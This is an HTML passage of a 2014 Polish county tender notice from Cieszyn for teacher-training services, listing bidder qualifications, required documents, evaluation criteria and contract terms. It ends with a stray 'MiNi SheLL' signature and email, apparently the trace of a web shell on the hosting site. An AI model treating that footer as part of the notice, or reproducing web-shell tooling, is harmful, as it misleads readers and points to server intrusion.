b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 12 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 26</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy, b) dokumenty w zakresie umocowania prawnego do podpisywania oferty, zgodnie z pkt 10.7 niniejszej SIWZ, c) jeżeli Wykonawca zamierza powierzyć Podwykonawcy do wykonania część usługi powinien on złożyć oświadczenie Wykonawcy o zakresie usług do wykonania przez Podwykonawcę, d) cv osób które będą uczestniczyć w wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie w pracy z grupą osób dorosłych - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy mogą nastąpić jedynie w formie pisemnego aneksu, pod rygorem nieważności.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wybory Wykonawcy, w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania specyfikacji istotnych warunków zamówienia i podpisywania umowy, które są niezależne od Wykonawcy a które uniemożliwiają realizację umowy w jej pierwotnym kształcie, w szczególności zmiany umowy mogą być następstwem:
a)	zmian przepisów prawnych mających wpływ na wykonanie przedmiotu zamówienia,
b)	wystąpienia /siły wyższej/. /Siła wyższa/ oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.cieszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn, pokój 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 09:00, miejsce: Kancelaria ogólna Starostwa Powiatowego w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. /Innowacyjny system wspomagania szkół w powiecie cieszyńskim/
współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com